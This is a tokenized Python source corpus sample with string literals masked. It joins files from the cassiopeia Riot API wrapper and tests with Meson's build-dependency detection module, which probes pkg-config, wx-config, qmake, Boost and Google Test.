id <EOL> def __ne__ ( self , other ) : <EOL> return self . id != other . id <EOL> def __hash__ ( self ) : <EOL> return hash ( self . id ) <EOL> @ property <EOL> def active ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . active <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def created ( self ) : <EOL> """<STR_LIT>""" <EOL> return datetime . datetime . strptime ( self . data . created_at , "<STR_LIT>" ) if self . data . created_at else None <EOL> @ property <EOL> def id ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . id <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def updates ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ Message ( update ) for update in self . data . updates ] <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class Message ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . Message <EOL> def __str__ ( self ) : <EOL> return self . content <EOL> def __iter__ ( self ) : <EOL> return iter ( self . translations ) <EOL> def __len__ ( self ) : <EOL> return len ( self . translations ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . translations [ index ] <EOL> def __eq__ ( self , other ) : <EOL> return self . id == other . id <EOL> def __ne__ ( self , other ) : <EOL> return self . id != other . id <EOL> def __hash__ ( self ) : <EOL> return hash ( self . id ) <EOL> @ property <EOL> def author ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . author <EOL> @ property <EOL> def content ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . content <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def created ( self ) : <EOL> """<STR_LIT>""" <EOL> return datetime . datetime . strptime ( self . data . created_at , "<STR_LIT>" ) if self . data . created_at else None <EOL> @ property <EOL> def id ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . 
id <EOL> @ property <EOL> def severity ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . severity <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def translations ( self ) : <EOL> """<STR_LIT>""" <EOL> return { translation . locale : Translation ( translation ) for translation in self . data . translations } <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def updated ( self ) : <EOL> """<STR_LIT>""" <EOL> return datetime . datetime . strptime ( self . data . updated_at , "<STR_LIT>" ) if self . data . updated_at else None <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class Translation ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . Translation <EOL> def __str__ ( self ) : <EOL> return self . content <EOL> @ property <EOL> def content ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . content <EOL> @ property <EOL> def locale ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . locale <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def updated ( self ) : <EOL> """<STR_LIT>""" <EOL> return datetime . datetime . strptime ( self . data . updated_at , "<STR_LIT>" ) if self . data . updated_at else None <EOL> def _sa_rebind_all ( ) : <EOL> Shard . dto_type = cassiopeia . type . dto . status . Shard <EOL> ShardStatus . dto_type = cassiopeia . type . dto . status . ShardStatus <EOL> Service . dto_type = cassiopeia . type . dto . status . Service <EOL> Incident . dto_type = cassiopeia . type . dto . status . Incident <EOL> Message . dto_type = cassiopeia . type . dto . status . Message <EOL> Translation . dto_type = cassiopeia . type . dto . status . Translation </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from cassiopeia import riotapi <EOL> from cassiopeia . type . core . common import LoadPolicy <EOL> def main ( ) : <EOL> riotapi . set_region ( "<STR_LIT>" ) <EOL> riotapi . print_calls ( False ) <EOL> key = os . environ [ "<STR_LIT>" ] <EOL> riotapi . set_api_key ( key ) <EOL> riotapi . set_load_policy ( LoadPolicy . lazy ) <EOL> match = riotapi . get_match ( <NUM_LIT> ) <EOL> print ( "<STR_LIT>" . format ( match . creation ) ) <EOL> print ( "<STR_LIT>" . format ( match . duration ) ) <EOL> print ( "<STR_LIT>" . format ( match . creation + match . duration ) ) <EOL> print ( "<STR_LIT>" . format ( match . version ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from cassiopeia import baseriotapi <EOL> from . . import int_test_handler <EOL> def test_all ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> test_summoners_by_name ( ) <EOL> test_summoners_by_id ( ) <EOL> test_summoner_masteries ( ) <EOL> test_summoner_names ( ) <EOL> test_summoner_runes ( ) <EOL> def test_summoners_by_name ( ) : <EOL> int_test_handler . test_result ( baseriotapi . get_summoners_by_name ( int_test_handler . summoner_name ) ) <EOL> def test_summoners_by_id ( ) : <EOL> int_test_handler . test_result ( baseriotapi . get_summoners_by_id ( int_test_handler . summoner_id ) ) <EOL> def test_summoner_masteries ( ) : <EOL> int_test_handler . test_result ( baseriotapi . get_summoner_masteries ( int_test_handler . summoner_id ) ) <EOL> def test_summoner_names ( ) : <EOL> int_test_handler . test_result ( baseriotapi . get_summoner_names ( int_test_handler . summoner_id ) ) <EOL> def test_summoner_runes ( ) : <EOL> int_test_handler . test_result ( baseriotapi . get_summoner_runes ( int_test_handler . summoner_id ) ) </s>
<s> from cerebrum . neuralnet . weaver import * </s>
<s> import re <EOL> import os , stat , glob , subprocess , shutil <EOL> import sysconfig <EOL> from . mesonlib import MesonException <EOL> from . import mlog <EOL> from . import mesonlib <EOL> class DependencyException ( MesonException ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> MesonException . __init__ ( self , * args , ** kwargs ) <EOL> class Dependency ( ) : <EOL> def __init__ ( self ) : <EOL> self . name = "<STR_LIT:null>" <EOL> self . is_found = False <EOL> def get_compile_args ( self ) : <EOL> return [ ] <EOL> def get_link_args ( self ) : <EOL> return [ ] <EOL> def found ( self ) : <EOL> return self . is_found <EOL> def get_sources ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ] <EOL> def get_name ( self ) : <EOL> return self . name <EOL> def get_exe_args ( self ) : <EOL> return [ ] <EOL> def need_threads ( self ) : <EOL> return False <EOL> class InternalDependency ( Dependency ) : <EOL> def __init__ ( self , incdirs , compile_args , link_args , libraries , sources , ext_deps ) : <EOL> super ( ) . __init__ ( ) <EOL> self . include_directories = incdirs <EOL> self . compile_args = compile_args <EOL> self . link_args = link_args <EOL> self . libraries = libraries <EOL> self . sources = sources <EOL> self . ext_deps = ext_deps <EOL> def get_compile_args ( self ) : <EOL> return self . compile_args <EOL> def get_link_args ( self ) : <EOL> return self . link_args <EOL> class PkgConfigDependency ( Dependency ) : <EOL> pkgconfig_found = None <EOL> def __init__ ( self , name , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . is_libtool = False <EOL> self . required = kwargs . get ( '<STR_LIT>' , True ) <EOL> self . static = kwargs . get ( '<STR_LIT>' , False ) <EOL> if not isinstance ( self . static , bool ) : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs and environment . is_cross_build ( ) : <EOL> want_cross = not kwargs [ '<STR_LIT>' ] <EOL> else : <EOL> want_cross = environment . 
is_cross_build()
        self.name = name
        # Probe pkg-config itself only once; result is cached on the class.
        if PkgConfigDependency.pkgconfig_found is None:
            self.check_pkgconfig()
        self.is_found = False
        if not PkgConfigDependency.pkgconfig_found:
            if self.required:
                raise DependencyException('<STR_LIT>')
            self.cargs = []
            self.libs = []
            return
        # Pick the cross pkg-config binary when cross compiling, else native.
        if environment.is_cross_build() and want_cross:
            if "<STR_LIT>" not in environment.cross_info.config["<STR_LIT>"]:
                raise DependencyException('<STR_LIT>')
            pkgbin = environment.cross_info.config["<STR_LIT>"]['<STR_LIT>']
            self.type_string = '<STR_LIT>'
        else:
            pkgbin = '<STR_LIT>'
            self.type_string = '<STR_LIT>'
        mlog.debug('<STR_LIT>' % (name, pkgbin))
        self.pkgbin = pkgbin
        # Query the module version; a nonzero exit means the module is absent.
        p = subprocess.Popen([pkgbin, '<STR_LIT>', name],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        out = p.communicate()[0]
        if p.returncode != 0:
            if self.required:
                raise DependencyException('<STR_LIT>' % (self.type_string, name))
            self.modversion = '<STR_LIT:none>'
            self.cargs = []
            self.libs = []
        else:
            self.modversion = out.decode().strip()
            mlog.log('<STR_LIT>' % self.type_string, mlog.bold(name), '<STR_LIT>',
                     mlog.green('<STR_LIT>'), self.modversion)
            self.version_requirement = kwargs.get('<STR_LIT:version>', None)
            if self.version_requirement is None:
                self.is_found = True
            else:
                if not isinstance(self.version_requirement, str):
                    raise DependencyException('<STR_LIT>')
                self.is_found = mesonlib.version_compare(self.modversion, self.version_requirement)
                if not self.is_found and self.required:
                    raise DependencyException(
                        '<STR_LIT>' %
                        (name, self.version_requirement, self.modversion))
        if not self.is_found:
            return
        # Fetch the compile flags.
        p = subprocess.Popen([pkgbin, '<STR_LIT>', name], stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        out = p.communicate()[0]
        if p.returncode != 0:
            raise DependencyException('<STR_LIT>' % (name, out.decode(errors='<STR_LIT:ignore>')))
        self.cargs = out.decode().split()
        # Fetch the link flags, optionally in static mode.
        libcmd = [pkgbin, '<STR_LIT>']
        if self.static:
            libcmd.append('<STR_LIT>')
        p = subprocess.Popen(libcmd + [name], stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        out = p.communicate()[0]
        if p.returncode != 0:
            raise DependencyException('<STR_LIT>' % (name, out.decode(errors='<STR_LIT:ignore>')))
        self.libs = []
        for lib in out.decode().split():
            if lib.endswith("<STR_LIT>"):
                # Resolve libtool .la archives to the actual shared library,
                # also checking the sibling directory used by libtool builds.
                shared_libname = self.extract_libtool_shlib(lib)
                shared_lib = os.path.join(os.path.dirname(lib), shared_libname)
                if not os.path.exists(shared_lib):
                    shared_lib = os.path.join(os.path.dirname(lib), "<STR_LIT>", shared_libname)
                if not os.path.exists(shared_lib):
                    raise DependencyException('<STR_LIT>'
                                              '<STR_LIT>'
                                              '<STR_LIT>' % lib)
                lib = shared_lib
                self.is_libtool = True
            self.libs.append(lib)

    def get_variable(self, variable_name):
        """Query a pkg-config variable (--variable=NAME) for this module."""
        p = subprocess.Popen([self.pkgbin, '<STR_LIT>' % variable_name, self.name],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out = p.communicate()[0]
        if p.returncode != 0:
            if self.required:
                raise DependencyException('<STR_LIT>' %
                                          (self.type_string, self.name))
        else:
            variable = out.decode().strip()
            mlog.debug('<STR_LIT>' % variable)
        # NOTE(review): if the query fails and self.required is false,
        # 'variable' is never assigned and this line raises
        # UnboundLocalError instead of returning something sensible.
        return variable

    def get_modversion(self):
        return self.modversion

    def get_compile_args(self):
        return self.cargs

    def get_link_args(self):
        return self.libs

    def check_pkgconfig(self):
        """Probe the pkg-config binary once; cache the result on the class."""
        try:
            p = subprocess.Popen(['<STR_LIT>', '<STR_LIT>'], stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
            out = p.communicate()[0]
            if p.returncode == 0:
                mlog.log('<STR_LIT>', mlog.bold(shutil.which('<STR_LIT>')),
                         '<STR_LIT>' % out.decode().strip())
                PkgConfigDependency.pkgconfig_found = True
                return
        except Exception:
            pass
        PkgConfigDependency.pkgconfig_found = False
        mlog.log('<STR_LIT>', mlog.red('<STR_LIT>'))

    def found(self):
        return self.is_found

    def extract_field(self, la_file, fieldname):
        # Parse "name=value" lines of a libtool .la file; the value is
        # quoted, hence the [1:-1] slice.
        for line in open(la_file):
            arr = line.strip().split('<STR_LIT:=>')
            if arr[0] == fieldname:
                return arr[1][1:-1]
        return None

    def extract_dlname_field(self, la_file):
        return self.extract_field(la_file, '<STR_LIT>')

    def extract_libdir_field(self, la_file):
        return self.extract_field(la_file, '<STR_LIT>')

    def extract_libtool_shlib(self, la_file):
        '''<STR_LIT>'''
        dlname = self.extract_dlname_field(la_file)
        if dlname is None:
            return None
        if mesonlib.is_osx():
            # On OS X return the full path when the libdir is known.
            dlbasename = os.path.basename(dlname)
            libdir = self.extract_libdir_field(la_file)
            if libdir is None:
                return dlbasename
            return os.path.join(libdir, dlbasename)
        return os.path.\
basename ( dlname ) <EOL> class WxDependency ( Dependency ) : <EOL> wx_found = None <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> if WxDependency . wx_found is None : <EOL> self . check_wxconfig ( ) <EOL> if not WxDependency . wx_found : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> self . is_found = False <EOL> p = subprocess . Popen ( [ self . wxc , '<STR_LIT>' ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode != <NUM_LIT:0> : <EOL> mlog . log ( '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> self . cargs = [ ] <EOL> self . libs = [ ] <EOL> else : <EOL> self . modversion = out . decode ( ) . strip ( ) <EOL> version_req = kwargs . get ( '<STR_LIT:version>' , None ) <EOL> if version_req is not None : <EOL> if not mesonlib . version_compare ( self . modversion , version_req ) : <EOL> mlog . log ( '<STR_LIT>' % ( self . modversion , version_req ) ) <EOL> return <EOL> mlog . log ( '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) ) <EOL> self . is_found = True <EOL> self . requested_modules = self . get_requested ( kwargs ) <EOL> p = subprocess . Popen ( [ self . wxc , '<STR_LIT>' ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode != <NUM_LIT:0> : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> self . cargs = out . decode ( ) . split ( ) <EOL> p = subprocess . Popen ( [ self . wxc , '<STR_LIT>' ] + self . requested_modules , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode != <NUM_LIT:0> : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> self . libs = out . decode ( ) . 
split ( ) <EOL> def get_requested ( self , kwargs ) : <EOL> modules = '<STR_LIT>' <EOL> if not modules in kwargs : <EOL> return [ ] <EOL> candidates = kwargs [ modules ] <EOL> if isinstance ( candidates , str ) : <EOL> return [ candidates ] <EOL> for c in candidates : <EOL> if not isinstance ( c , str ) : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> return candidates <EOL> def get_modversion ( self ) : <EOL> return self . modversion <EOL> def get_compile_args ( self ) : <EOL> return self . cargs <EOL> def get_link_args ( self ) : <EOL> return self . libs <EOL> def check_wxconfig ( self ) : <EOL> for wxc in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> try : <EOL> p = subprocess . Popen ( [ wxc , '<STR_LIT>' ] , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode == <NUM_LIT:0> : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( shutil . which ( wxc ) ) , <EOL> '<STR_LIT>' % out . decode ( ) . strip ( ) ) <EOL> self . wxc = wxc <EOL> WxDependency . wx_found = True <EOL> return <EOL> except Exception : <EOL> pass <EOL> WxDependency . wxconfig_found = False <EOL> mlog . log ( '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> def found ( self ) : <EOL> return self . is_found <EOL> class ExternalProgram ( ) : <EOL> def __init__ ( self , name , fullpath = None , silent = False , search_dir = None ) : <EOL> self . name = name <EOL> self . fullpath = None <EOL> if fullpath is not None : <EOL> if not isinstance ( fullpath , list ) : <EOL> self . fullpath = [ fullpath ] <EOL> else : <EOL> self . fullpath = fullpath <EOL> else : <EOL> self . fullpath = [ shutil . which ( name ) ] <EOL> if self . fullpath [ <NUM_LIT:0> ] is None and search_dir is not None : <EOL> trial = os . path . join ( search_dir , name ) <EOL> suffix = os . path . splitext ( trial ) [ - <NUM_LIT:1> ] . lower ( ) [ <NUM_LIT:1> : ] <EOL> if mesonlib . 
is_windows ( ) and ( suffix == '<STR_LIT>' or suffix == '<STR_LIT>' or suffix == '<STR_LIT>' ) : <EOL> self . fullpath = [ trial ] <EOL> elif not mesonlib . is_windows ( ) and os . access ( trial , os . X_OK ) : <EOL> self . fullpath = [ trial ] <EOL> else : <EOL> try : <EOL> first_line = open ( trial ) . readline ( ) . strip ( ) <EOL> if first_line . startswith ( '<STR_LIT>' ) : <EOL> commands = first_line [ <NUM_LIT:2> : ] . split ( '<STR_LIT:#>' ) [ <NUM_LIT:0> ] . strip ( ) . split ( ) <EOL> if mesonlib . is_windows ( ) : <EOL> commands [ <NUM_LIT:0> ] = commands [ <NUM_LIT:0> ] . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:1> ] <EOL> if commands [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> commands = commands [ <NUM_LIT:1> : ] <EOL> self . fullpath = commands + [ trial ] <EOL> except Exception : <EOL> pass <EOL> if not silent : <EOL> if self . found ( ) : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( name ) , '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % '<STR_LIT:U+0020>' . join ( self . fullpath ) ) <EOL> else : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( name ) , '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> def found ( self ) : <EOL> return self . fullpath [ <NUM_LIT:0> ] is not None <EOL> def get_command ( self ) : <EOL> return self . fullpath <EOL> def get_name ( self ) : <EOL> return self . name <EOL> class ExternalLibrary ( Dependency ) : <EOL> def __init__ ( self , name , link_args = None , silent = False ) : <EOL> super ( ) . __init__ ( ) <EOL> self . name = name <EOL> if link_args is not None : <EOL> if isinstance ( link_args , list ) : <EOL> self . link_args = link_args <EOL> else : <EOL> self . link_args = [ link_args ] <EOL> else : <EOL> self . link_args = link_args <EOL> if not silent : <EOL> if self . found ( ) : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( name ) , '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) ) <EOL> else : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( name ) , '<STR_LIT>' , mlog . 
red('<STR_LIT>'))

    def found(self):
        # Found iff explicit link arguments were supplied.
        return self.link_args is not None

    def get_link_args(self):
        if self.found():
            return self.link_args
        return []


class BoostDependency(Dependency):
    """Boost detected from $BOOST_ROOT-style env var or system locations."""

    # Map from meson module names to boost library basenames.
    name2lib = {'<STR_LIT:test>': '<STR_LIT>'}

    def __init__(self, environment, kwargs):
        Dependency.__init__(self)
        self.name = '<STR_LIT>'
        self.libdir = '<STR_LIT>'
        try:
            self.boost_root = os.environ['<STR_LIT>']
            if not os.path.isabs(self.boost_root):
                raise DependencyException('<STR_LIT>')
        except KeyError:
            self.boost_root = None
        if self.boost_root is None:
            if mesonlib.is_windows():
                self.boost_root = self.detect_win_root()
                self.incdir = self.boost_root
            else:
                self.incdir = '<STR_LIT>'
        else:
            self.incdir = os.path.join(self.boost_root, '<STR_LIT>')
        self.boost_inc_subdir = os.path.join(self.incdir, '<STR_LIT>')
        mlog.debug('<STR_LIT>', self.boost_root)
        self.src_modules = {}
        self.lib_modules = {}
        self.lib_modules_mt = {}
        self.detect_version()
        self.requested_modules = self.get_requested(kwargs)
        module_str = '<STR_LIT:U+002CU+0020>'.join(self.requested_modules)
        if self.version is not None:
            self.detect_src_modules()
            self.detect_lib_modules()
            self.validate_requested()
            if self.boost_root is not None:
                info = self.version + '<STR_LIT:U+002CU+0020>' + self.boost_root
            else:
                info = self.version
            mlog.log('<STR_LIT>' % module_str, mlog.green('<STR_LIT>'),
                     '<STR_LIT:(>' + info + '<STR_LIT:)>')
        else:
            mlog.log("<STR_LIT>" % module_str, mlog.red('<STR_LIT>'))

    def detect_win_root(self):
        # Glob for an installed Boost under the conventional Windows path.
        globtext = '<STR_LIT>'
        files = glob.glob(globtext)
        if len(files) > 0:
            return files[0]
        return '<STR_LIT>'

    def get_compile_args(self):
        args = []
        if self.boost_root is not None:
            if mesonlib.is_windows():
                args.append('<STR_LIT>' + self.boost_root)
            else:
                args.append('<STR_LIT>' + os.path.join(self.boost_root, '<STR_LIT>'))
        else:
            args.append('<STR_LIT>' + self.incdir)
        return args

    def get_requested(self, kwargs):
        candidates = kwargs.get('<STR_LIT>', [])
        if isinstance(candidates, str):
            return [candidates]
        for c in candidates:
            if not isinstance(c, str):
                raise DependencyException('<STR_LIT>')
        return candidates

    def validate_requested(self):
        # Every requested module must have matching headers on disk.
        for m in self.requested_modules:
            if m not in self.src_modules:
                raise DependencyException('<STR_LIT>' % m)

    def found(self):
        return self.version is not None

    def get_version(self):
        return self.version

    def detect_version(self):
        try:
            ifile = open(os.path.join(self.boost_inc_subdir, '<STR_LIT>'))
        except FileNotFoundError:
            self.version = None
            return
        for line in ifile:
            # Find the version #define; the value is quoted, hence [1:-1].
            if line.startswith("<STR_LIT>") and '<STR_LIT>' in line:
                ver = line.split()[-1]
                ver = ver[1:-1]
                self.version = ver.replace('<STR_LIT:_>', '<STR_LIT:.>')
                return
        self.version = None

    def detect_src_modules(self):
        # Every subdirectory of the Boost include dir is a header module.
        for entry in os.listdir(self.boost_inc_subdir):
            entry = os.path.join(self.boost_inc_subdir, entry)
            if stat.S_ISDIR(os.stat(entry).st_mode):
                self.src_modules[os.path.split(entry)[-1]] = True

    def detect_lib_modules(self):
        if mesonlib.is_windows():
            return self.detect_lib_modules_win()
        return self.detect_lib_modules_nix()

    def detect_lib_modules_win(self):
        if mesonlib.is_32bit():
            gl = '<STR_LIT>'
        else:
            gl = '<STR_LIT>'
        libdir = glob.glob(os.path.join(self.boost_root, gl))
        if len(libdir) == 0:
            return
        libdir = libdir[0]
        self.libdir = libdir
        globber = '<STR_LIT>'
        for entry in glob.glob(os.path.join(libdir, globber)):
            (_, fname) = os.path.split(entry)
            # Strip prefix, then the trailing version/variant decorations.
            base = fname.split('<STR_LIT:_>', 1)[1]
            modname = base.split('<STR_LIT:->', 1)[0]
            self.lib_modules_mt[modname] = fname

    def detect_lib_modules_nix(self):
        libsuffix = None
        if mesonlib.is_osx():
            libsuffix = '<STR_LIT>'
        else:
            libsuffix = '<STR_LIT>'
        globber = '<STR_LIT>'.format(libsuffix)
        if self.boost_root is None:
            libdirs = mesonlib.get_library_dirs()
        else:
            libdirs = [os.path.join(self.boost_root, '<STR_LIT>')]
        for libdir in libdirs:
            for entry in glob.glob(os.path.join(libdir, globber)):
                lib = os.path.basename(entry)
                name = lib.split('<STR_LIT:.>')[0].split('<STR_LIT:_>', 1)[-1]
                # Multithreaded variants are tracked in a separate table.
                if entry.endswith('<STR_LIT>'):
                    self.lib_modules_mt[name] = True
                else:
                    self.lib_modules[name] = True

    def get_win_link_args(self):
        args = []
        if self.boost_root:
            args.append('<STR_LIT>' + self.libdir)
        for module in self.requested_modules:
            module = BoostDependency.name2lib.get(module, module)
            if module in self.lib_modules_mt:
                args.append(self.
lib_modules_mt[module])
        return args

    def get_link_args(self):
        if mesonlib.is_windows():
            return self.get_win_link_args()
        args = []
        if self.boost_root:
            args.append('<STR_LIT>' + os.path.join(self.boost_root, '<STR_LIT>'))
        for module in self.requested_modules:
            module = BoostDependency.name2lib.get(module, module)
            if module in self.lib_modules or module in self.lib_modules_mt:
                linkcmd = '<STR_LIT>' + module
                args.append(linkcmd)
                if module == '<STR_LIT>':
                    args.append('<STR_LIT>')
            elif module + '<STR_LIT>' in self.lib_modules_mt:
                # Fall back to the multithreaded variant of the library.
                linkcmd = '<STR_LIT>' + module + '<STR_LIT>'
                args.append(linkcmd)
                if module == '<STR_LIT>':
                    args.append('<STR_LIT>')
        return args

    def get_sources(self):
        return []

    def need_threads(self):
        return '<STR_LIT>' in self.requested_modules


class GTestDependency(Dependency):
    """Google Test, used prebuilt or compiled from installed sources."""

    def __init__(self, environment, kwargs):
        Dependency.__init__(self)
        # Whether the gtest main() library/source should be linked in too.
        self.main = kwargs.get('<STR_LIT>', False)
        self.name = '<STR_LIT>'
        self.libname = '<STR_LIT>'
        self.libmain_name = '<STR_LIT>'
        self.include_dir = '<STR_LIT>'
        self.src_include_dir = '<STR_LIT>'
        self.src_dir = '<STR_LIT>'
        self.all_src = mesonlib.File.from_absolute_file(
            os.path.join(self.src_dir, '<STR_LIT>'))
        self.main_src = mesonlib.File.from_absolute_file(
            os.path.join(self.src_dir, '<STR_LIT>'))
        self.detect()

    def found(self):
        return self.is_found

    def detect(self):
        trial_dirs = mesonlib.get_library_dirs()
        glib_found = False
        gmain_found = False
        for d in trial_dirs:
            if os.path.isfile(os.path.join(d, self.libname)):
                glib_found = True
            if os.path.isfile(os.path.join(d, self.libmain_name)):
                gmain_found = True
        if glib_found and gmain_found:
            # Prebuilt libraries are available; just link against them.
            self.is_found = True
            self.compile_args = []
            self.link_args = ['<STR_LIT>']
            if self.main:
                self.link_args.append('<STR_LIT>')
            self.sources = []
            mlog.log('<STR_LIT>', mlog.green('<STR_LIT>'), '<STR_LIT>')
        elif os.path.exists(self.src_dir):
            # No binaries; compile gtest from its installed sources instead.
            self.is_found = True
            self.compile_args = ['<STR_LIT>' + self.src_include_dir]
            self.link_args = []
            if self.main:
                self.sources = [self.all_src, self.main_src]
            else:
                self.sources = [self.all_src]
            mlog.log('<STR_LIT>', mlog.green('<STR_LIT>'), '<STR_LIT>')
        else:
            mlog.log('<STR_LIT>', mlog.red('<STR_LIT>'))
            self.is_found = False
        return self.is_found

    def get_compile_args(self):
        arr = []
        if self.include_dir != '<STR_LIT>':
            arr.append('<STR_LIT>' + self.include_dir)
        arr.append('<STR_LIT>' + self.src_include_dir)
        return arr

    def get_link_args(self):
        return self.link_args

    def get_version(self):
        return '<STR_LIT>'

    def get_sources(self):
        return self.sources

    def need_threads(self):
        return True


class GMockDependency(Dependency):
    """Google Mock, used prebuilt or compiled from installed sources."""

    def __init__(self, environment, kwargs):
        Dependency.__init__(self)
        self.name = '<STR_LIT>'
        self.libname = '<STR_LIT>'
        trial_dirs = mesonlib.get_library_dirs()
        gmock_found = False
        for d in trial_dirs:
            if os.path.isfile(os.path.join(d, self.libname)):
                gmock_found = True
        if gmock_found:
            # Prebuilt library found; link directly.
            self.is_found = True
            self.compile_args = []
            self.link_args = ['<STR_LIT>']
            self.sources = []
            mlog.log('<STR_LIT>', mlog.
green('<STR_LIT>'), '<STR_LIT>')
            return
        # No prebuilt library; look for bundled gmock sources instead.
        for d in ['<STR_LIT>', '<STR_LIT>']:
            if os.path.exists(d):
                self.is_found = True
                self.compile_args = ['<STR_LIT>', '<STR_LIT>']
                self.link_args = []
                all_src = mesonlib.File.from_absolute_file(os.path.join(d, '<STR_LIT>'))
                main_src = mesonlib.File.from_absolute_file(os.path.join(d, '<STR_LIT>'))
                if kwargs.get('<STR_LIT>', False):
                    self.sources = [all_src, main_src]
                else:
                    self.sources = [all_src]
                mlog.log('<STR_LIT>', mlog.green('<STR_LIT>'), '<STR_LIT>')
                return
        mlog.log('<STR_LIT>', mlog.red('<STR_LIT>'))
        self.is_found = False

    def get_version(self):
        return '<STR_LIT>'

    def get_compile_args(self):
        return self.compile_args

    def get_sources(self):
        return self.sources

    def get_link_args(self):
        return self.link_args

    def found(self):
        return self.is_found


class Qt5Dependency(Dependency):
    """Qt 5 found via pkg-config, qmake, or OS X frameworks."""

    def __init__(self, environment, kwargs):
        Dependency.__init__(self)
        self.name = '<STR_LIT>'
        self.root = '<STR_LIT>'
        mods = kwargs.get('<STR_LIT>', [])
        self.cargs = []
        self.largs = []
        self.is_found = False
        if isinstance(mods, str):
            mods = [mods]
        if len(mods) == 0:
            raise DependencyException('<STR_LIT>')
        type_text = '<STR_LIT>'
        # Detection preference: cross pkg-config, native pkg-config, qmake.
        if environment.is_cross_build() and kwargs.get('<STR_LIT>', False):
            type_text = '<STR_LIT>'
            self.pkgconfig_detect(mods, environment, kwargs)
        elif not environment.is_cross_build() and shutil.which('<STR_LIT>') is not None:
            self.pkgconfig_detect(mods, environment, kwargs)
        elif shutil.which('<STR_LIT>') is not None:
            self.qmake_detect(mods, kwargs)
        else:
            self.version = '<STR_LIT:none>'
        if not self.is_found:
            mlog.log('<STR_LIT>' % type_text, mlog.red('<STR_LIT>'))
        else:
            mlog.log('<STR_LIT>' % type_text, mlog.green('<STR_LIT>'))

    def pkgconfig_detect(self, mods, environment, kwargs):
        # One PkgConfigDependency per requested Qt module.
        modules = []
        for module in mods:
            modules.append(PkgConfigDependency('<STR_LIT>' + module, environment, kwargs))
        for m in modules:
            self.cargs += m.get_compile_args()
            self.largs += m.get_link_args()
        self.is_found = True
        self.version = modules[0].modversion

    def qmake_detect(self, mods, kwargs):
        pc = subprocess.Popen(['<STR_LIT>', '<STR_LIT>'], stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE)
        (stdo, _) = pc.communicate()
        if pc.returncode != 0:
            return
        stdo = stdo.decode()
        if not '<STR_LIT>' in stdo:
            mlog.log('<STR_LIT>')
            return
        self.version = re.search('<STR_LIT>', stdo).group(0)
        (stdo, _) = subprocess.Popen(['<STR_LIT>', '<STR_LIT>'], stdout=subprocess.PIPE).communicate()
        qvars = {}
        # Parse the KEY:value lines emitted by qmake -query.
        for line in stdo.decode().split('<STR_LIT:\n>'):
            line = line.strip()
            if line == '<STR_LIT>':
                continue
            (k, v) = tuple(line.split('<STR_LIT::>', 1))
            qvars[k] = v
        if mesonlib.is_osx():
            return self.framework_detect(qvars, mods, kwargs)
        incdir = qvars['<STR_LIT>']
        self.cargs.append('<STR_LIT>' + incdir)
        libdir = qvars['<STR_LIT>']
        bindir = qvars['<STR_LIT>']
        for module in mods:
            mincdir = os.path.join(incdir, '<STR_LIT>' + module)
